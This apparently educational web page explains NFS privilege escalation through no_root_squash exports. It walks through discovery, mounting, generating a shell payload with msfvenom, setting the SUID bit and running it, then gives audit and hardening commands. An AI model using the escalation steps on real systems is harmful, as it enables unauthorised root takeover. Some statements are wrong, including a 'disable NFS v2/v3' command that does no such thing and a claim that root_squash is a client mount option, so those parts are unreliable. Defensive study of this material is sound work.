Privilege Escalation via Misconfigured NFS (Conceptual Overview)
Network File System (NFS) allows remote file sharing over a network. When misconfigured with insecure options, it can permit local privilege escalation by manipulating file ownership and permissions.
π What is Network File System (NFS)?
NFS enables systems to share directories and files with remote clients, commonly used in enterprise environments for centralized storage.
Security depends heavily on export configurations and client mounting options.
π§ How NFS-Based Escalation Happens (High-Level)
- β NFS exports are configured with insecure flags
- β Client can mount with root_squash disabled
- β User creates SUID/SGID binaries on mounted share
- β Remote execution triggers privilege escalation
root_squash and restricted exports.
π₯ Why NFS Misconfigurations Are Dangerous
- β Bypasses local file permission models
- β Allows remote SUID/SGID binary creation
- β Can lead to full root compromise
- β Often overlooked in security audits
π Real-World Example (Defensive View)
An administrator exports a directory with no_root_squash for convenience,
allowing any client to create files with root ownership.
An attacker mounts the share, creates a SUID root shell, and gains elevated privileges.
no_root_squash should only be used in trusted, controlled environments.
π Detecting Risky NFS Configurations
- β Exports with
no_root_squash - β World-readable/writable exports
- β Unrestricted client access in exports
- β Insecure NFS versions (v1, v2 without secure flags)
π‘οΈ Preventing NFS-Based Escalation
- β Always use
root_squash(default) - β Restrict exports to specific IPs/networks
- β Use NFSv4 with Kerberos authentication
- β Regularly audit
/etc/exportsconfigurations - β Monitor for unauthorized mount attempts
π§Ύ Key Takeaways
- β NFS misconfigurations can lead to privilege escalation
- β
no_root_squashis the primary risk factor - β Regular configuration audits are essential
- β Network-level restrictions complement filesystem permissions
π NFS Privilege Escalation β Command Awareness
Common commands observed during NFS security audits and investigations. Shown for defensive awareness and educational purposes only.
π NFS Service Discovery
-
Check for NFS services
Why used: Identify running RPC services including NFS.rpcinfo -p [target_ip] -
List NFS shares (if allowed)
Why used: Discover exported directories. May be blocked by firewall or restricted.showmount -e [target_ip]
showmount -e should only work for authorized clients in secure setups.
π Mount Operations (High Risk if Misconfigured)
-
Create local mount point
Why used: Prepare directory for mounting remote NFS share.mkdir /mnt/tmp -
Mount NFS share (insecure example)
Why used: Mount remotemount -o rw,vers=3 [target_ip]:/tmp /mnt/tmp/tmpshare locally. NFSv3 without secure options may preserve root ownership. -
Verify mount
Why used: Confirm successful NFS mount and view options.mount | grep nfs
π Share Content Inspection
-
Navigate to mount point
Why used: Access mounted NFS share for inspection.cd /mnt/tmp -
List share contents
Why used: Examine files, ownership, and permissions on mounted share.ls -al
β‘ Binary Creation (Critical Risk)
no_root_squash.
-
Generate executable payload (example)
Why used: Create a standalone ELF executable that spawns a shell. In labs, this demonstrates payload generation concepts.msfvenom -p linux/x64/exec CMD="/bin/sh" -f elf -o shell.elf -
Verify file creation
Why used: Confirm payload exists and check ownership/permissions.ls -al -
Set SUID bit (dangerous if misconfigured)
Why used: Make executable run with file owner's privileges. On NFS withchmod +xs ./shell.elfno_root_squash, this could be root-owned. -
Verify SUID bit set
Why used: Confirm SUID/SGID permissions are applied.ls -al
π¨ Execution Phase (Maximum Risk)
-
Execute binary (example scenario)
Why used: If binary is root-owned SUID on misconfigured NFS, this could escalate privileges../shell.elf
π§Ή Cleanup & Verification
-
Unmount NFS share
Why used: Properly disconnect mounted share.umount /mnt/tmp -
Remove mount point
Why used: Clean up temporary directory.rmdir /mnt/tmp -
Check user identity
Why used: Verify current privilege level after tests.id
π‘οΈ Defensive NFS Commands
-
Review NFS exports safely
Why used: Check server-side NFS configurations for insecure options.cat /etc/exports -
Check currently mounted NFS shares
Why used: List clients connected to NFS shares (server-side).showmount -a localhost -
Find SUID binaries on NFS mounts
Why used: Audit for SUID binaries on mounted NFS shares.find /mnt -type f -perm -4000 2>/dev/null
π§ NFS Security Hardening
-
Secure /etc/exports example
Why used: Example of secure NFS export with root_squash enabled./shared/data client_ip(rw,root_squash,sync,no_subtree_check) -
Disable insecure NFS versions
Why used: Disable insecure NFS v2/v3 if not needed.echo "NEED_SVCGSSD=no" >> /etc/default/nfs-common
root_squash and restrict exports to specific IP addresses.
π Security References
-
NFS Security Best Practices
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/storage_administration_guide/nfs-security -
CIS Benchmarks for NFS
https://www.cisecurity.org/benchmark/linux
π‘οΈ Defender Takeaways
- β Audit
/etc/exportsregularly - β Ensure
root_squashis enabled - β Restrict exports to specific IPs/networks
- β Monitor for unauthorized mount attempts
- β Scan NFS shares for SUID/SGID binaries
